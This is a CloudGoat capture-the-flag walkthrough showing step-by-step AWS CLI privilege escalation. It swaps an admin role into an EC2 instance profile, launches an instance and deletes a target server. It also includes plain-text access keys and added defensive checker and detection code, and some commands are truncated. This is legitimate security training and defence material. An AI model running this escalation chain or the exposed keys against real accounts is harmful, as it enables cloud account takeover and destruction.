Cloudgoat AWS CTF solution - Scenario 5 (iam_privesc_by_attachment)

Oct 19, 2022

Scenario: iam_privesc_by_attachment


git clone
cd cloudgoat
chmod +x
./ create iam_privesc_by_attachment

Scenario Resources

  • 1 VPC with: EC2 x 1
  • 1 IAM User

Scenario Start(s)

  1. IAM User “Kerrigan”

Scenario Goal(s)

Delete the EC2 instance “cg-super-critical-security-server”


Starting with a very limited set of permissions, the attacker is able to leverage the instance-profile-attachment permissions to create a new EC2 instance with significantly greater privileges than their own. With access to this new EC2 instance, the attacker gains full administrative powers within the target account and is able to accomplish the scenario’s goal — deleting the cg-super-critical-security-server and paving the way for further nefarious actions.

Exploitation Route(s)

Walkthrough — IAM User “kerrigan”

  1. Starting as the IAM user “Kerrigan,” the attacker uses their limited privileges to explore the environment.

a. Used pacu’s “iam__bruteforce_permissions” module to enumerate permissions-

run iam__bruteforce_permissions


b. Using enumerate-iam to brute-force permissions.

git clone
cd enumerate-iam/
pip3 install -r requirements.txt
cd enumerate_iam
git clone

After cloning aws-sdk-js into the “enumerate_iam” folder, run the script.

c. Running “enumerate-iam”-

python3 --access-key AKIA4SM4ZEUHX7V5LYEU --secret-key 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

2. Checking running ec2 instances using ec2:DescribeInstances-

aws ec2 describe-instances --region us-east-1 --profile kerrigan --output text

3. Checking available instance profiles-

aws iam list-instance-profiles --profile kerrigan

We found an interesting instance profile “arn:aws:iam::864154101007:instance-profile/cg-ec2-meek-instance-profile-iam_privesc_by_attachment_cgidztq4yffc22” with the role “cg-ec2-meek-role-iam_privesc_by_attachment_cgidztq4yffc22” attached.

4. Let’s list the roles, since we have the list-roles permission-

aws iam list-roles --profile kerrigan

We found 2 interesting roles-

cg-ec2-meek-role-iam_privesc_by_attachment_cgidztq4yffc22 and cg-ec2-mighty-role-iam_privesc_by_attachment_cgidztq4yffc22; judging by the name, the “mighty” one seems more interesting.

5. Let’s try to add “mighty” role to the instance profile.

Note: our enumeration tools (Pacu and enumerate-iam) were unable to determine these four permissions-

“iam:AddRoleToInstanceProfile”, “iam:RemoveRoleFromInstanceProfile”, “ec2:AssociateIamInstanceProfile”, “ec2:RunInstances”

but upon checking manually I found that our user has these additional permissions.
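As an added defender-side example that is not part of the original post: a small checker over an IAM identity policy document that flags the grant combination just listed (role add/remove on an instance profile together with a way to run compute under that profile). The sample policy is constructed for illustration and is not CloudGoat's real policy; the function names are my own.

```python
import fnmatch
import json

# Constructed sample identity policy for this scenario's user (an illustration,
# not CloudGoat's real policy document): Describe/Run/Associate on EC2 plus
# role add/remove on instance profiles, the combination the walkthrough abuses.
SAMPLE_POLICY = json.loads("""
{"Version": "2012-10-17",
 "Statement": [{"Effect": "Allow", "Resource": "*",
                "Action": ["ec2:Describe*", "ec2:RunInstances", "ec2:CreateKeyPair",
                           "ec2:AssociateIamInstanceProfile",
                           "iam:ListRoles", "iam:ListInstanceProfiles",
                           "iam:AddRoleToInstanceProfile",
                           "iam:RemoveRoleFromInstanceProfile"]}]}
""")

# The chain in this scenario: swap the role inside an existing instance profile,
# then get compute to run under that profile (a new instance or an existing one).
SWAP_ACTIONS = ("iam:AddRoleToInstanceProfile", "iam:RemoveRoleFromInstanceProfile")
USE_ACTIONS = ("ec2:AssociateIamInstanceProfile", "ec2:RunInstances")


def _as_list(value):
    return value if isinstance(value, list) else [value]


def allowed_actions(policy, candidates):
    """Return the subset of `candidates` the policy grants.

    Expands wildcard actions ("ec2:*", "iam:Add*"), applies explicit Deny over
    Allow, and understands NotAction. Resource and Condition are ignored (treated
    as "*"), so the result is an upper bound: the safe direction for a defender.
    """
    allowed, denied = set(), set()
    for stmt in _as_list(policy.get("Statement", [])):
        negate = "NotAction" in stmt
        patterns = [p.lower() for p in _as_list(stmt.get("NotAction" if negate else "Action", []))]
        for action in candidates:
            matched = any(fnmatch.fnmatchcase(action.lower(), p) for p in patterns)
            if matched != negate:  # the statement applies to this action
                (allowed if stmt.get("Effect") == "Allow" else denied).add(action)
    return allowed - denied


def instance_profile_privesc_risk(policy):
    """True when one policy grants the add-role half and a way to use the profile."""
    granted = allowed_actions(policy, SWAP_ACTIONS + USE_ACTIONS)
    return "iam:AddRoleToInstanceProfile" in granted and bool(granted & set(USE_ACTIONS))
```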

aws iam add-role-to-instance-profile --instance-profile-name cg-ec2-meek-instance-profile-iam_privesc_by_attachment_cgidztq4yffc22 --role-name cg-ec2-mighty-role-iam_privesc_by_attachment_cgidztq4yffc22  --profile kerrigan

We got an error: “Cannot exceed quota for InstanceSessionsPerInstanceProfile: 1”. An instance profile can hold only one role, so let’s remove the currently attached role and then add the “mighty” role-

aws iam remove-role-from-instance-profile --instance-profile-name cg-ec2-meek-instance-profile-iam_privesc_by_attachment_cgidztq4yffc22 --role-name cg-ec2-meek-role-iam_privesc_by_attachment_cgidztq4yffc22 --profile kerrigan
aws iam add-role-to-instance-profile --instance-profile-name cg-ec2-meek-instance-profile-iam_privesc_by_attachment_cgidztq4yffc22 --role-name cg-ec2-mighty-role-iam_privesc_by_attachment_cgidztq4yffc22 --profile kerrigan

We didn’t get any error this time.

6. Now we can use the ec2:AssociateIamInstanceProfile permission to associate this profile (“cg-ec2-meek-instance-profile-iam_privesc_by_attachment_cgidztq4yffc22”) with the running EC2 instance.

aws ec2 associate-iam-instance-profile --iam-instance-profile file://instance_profile.json --instance-id "i-0f1a8f37275d27fcd" --profile kerrigan --region

7. Now we are ready to spin up an EC2 instance with full permissions.

a) Creating an EC2 SSH key pair-

aws ec2 create-key-pair --key-name pwned --profile kerrigan --query 'KeyMaterial' --region us-east-1 --output text > pwned.pem

b) Launching the EC2 instance-

aws ec2 describe-security-groups --profile kerrigan --region us-east-1
aws ec2 describe-subnets --profile kerrigan --region us-east-1
aws ec2 run-instances --image-id ami-0a313d6098716f372 --instance-type t2.micro --iam-instance-profile Arn=arn:aws:iam::864154101007:instance-profile/cg-ec2-meek-instance-profile-iam_privesc_by_attachment_cgid7c11loyvlf --key-name pwned --profile kerrigan --subnet-id subnet-07be3953f5accbd47 --security-group-ids sg-0523b1376503ede0a --region us-east-1

Then use describe-instances to get the public IP.
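The sequence in steps 5 to 7 leaves a distinctive CloudTrail trail: RemoveRoleFromInstanceProfile, then AddRoleToInstanceProfile on the same profile, then RunInstances or AssociateIamInstanceProfile referencing it. As an added detection example that is not part of the original post, here is that correlation run over constructed records (the account ID, ARNs and timestamps are made up, and the records are trimmed to the fields the check reads):

```python
import json
from datetime import datetime, timedelta

# Constructed CloudTrail-style records, trimmed to the fields this check reads.
# Account id, names and times are made up; records 2-4 mirror the remove/add/run
# sequence from the walkthrough, the last one is benign noise from another user.
SAMPLE_EVENTS = [json.loads(line) for line in """
{"eventTime": "2022-10-19T10:00:05Z", "eventName": "ListInstanceProfiles", "userIdentity": {"arn": "arn:aws:iam::111111111111:user/kerrigan"}}
{"eventTime": "2022-10-19T10:01:10Z", "eventName": "RemoveRoleFromInstanceProfile", "userIdentity": {"arn": "arn:aws:iam::111111111111:user/kerrigan"}, "requestParameters": {"instanceProfileName": "cg-ec2-meek-instance-profile", "roleName": "cg-ec2-meek-role"}}
{"eventTime": "2022-10-19T10:01:20Z", "eventName": "AddRoleToInstanceProfile", "userIdentity": {"arn": "arn:aws:iam::111111111111:user/kerrigan"}, "requestParameters": {"instanceProfileName": "cg-ec2-meek-instance-profile", "roleName": "cg-ec2-mighty-role"}}
{"eventTime": "2022-10-19T10:05:00Z", "eventName": "RunInstances", "userIdentity": {"arn": "arn:aws:iam::111111111111:user/kerrigan"}, "requestParameters": {"iamInstanceProfile": {"arn": "arn:aws:iam::111111111111:instance-profile/cg-ec2-meek-instance-profile"}}}
{"eventTime": "2022-10-19T11:00:00Z", "eventName": "AddRoleToInstanceProfile", "userIdentity": {"arn": "arn:aws:iam::111111111111:user/admin"}, "requestParameters": {"instanceProfileName": "build-profile", "roleName": "build-role"}}
""".strip().splitlines()]

PROFILE_USE = {"AssociateIamInstanceProfile", "RunInstances"}


def _when(event):
    return datetime.strptime(event["eventTime"], "%Y-%m-%dT%H:%M:%SZ")


def _names_profile(event, profile):
    # RunInstances/AssociateIamInstanceProfile carry the profile as an ARN or a
    # name nested in requestParameters; a substring check covers both shapes.
    return profile in json.dumps(event.get("requestParameters", {}))


def find_role_swaps(events, window_minutes=30):
    """Flag principals that replace the role inside an instance profile and then
    launch or re-associate compute with that profile within the window."""
    window = timedelta(minutes=window_minutes)
    findings, per_actor = [], {}
    for event in sorted(events, key=_when):
        per_actor.setdefault(event["userIdentity"]["arn"], []).append(event)
    for actor, evs in per_actor.items():
        for i, add in enumerate(evs):
            if add["eventName"] != "AddRoleToInstanceProfile":
                continue
            profile = add["requestParameters"]["instanceProfileName"]
            removed = [e["requestParameters"]["roleName"] for e in evs[:i]
                       if e["eventName"] == "RemoveRoleFromInstanceProfile"
                       and e["requestParameters"]["instanceProfileName"] == profile
                       and _when(add) - _when(e) <= window]
            used = any(e["eventName"] in PROFILE_USE and _names_profile(e, profile)
                       and _when(e) - _when(add) <= window for e in evs[i + 1:])
            if removed and used:
                findings.append({"actor": actor, "profile": profile, "old_role": removed[-1],
                                 "new_role": add["requestParameters"]["roleName"]})
    return findings
```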

8. Logging in and fetching credentials from this instance-

ssh -i pwned.pem ubuntu@


We can install the AWS CLI directly on the EC2 instance and then run the commands from within it.

9. Using these credentials to delete “cg-super-critical-security-server”

# Determining the instance ID
aws ec2 describe-instances --region us-east-1 --profile ec2_role


aws ec2 terminate-instances --instance-ids i-0064345de3f005c7a --region us-east-1 --profile ec2_role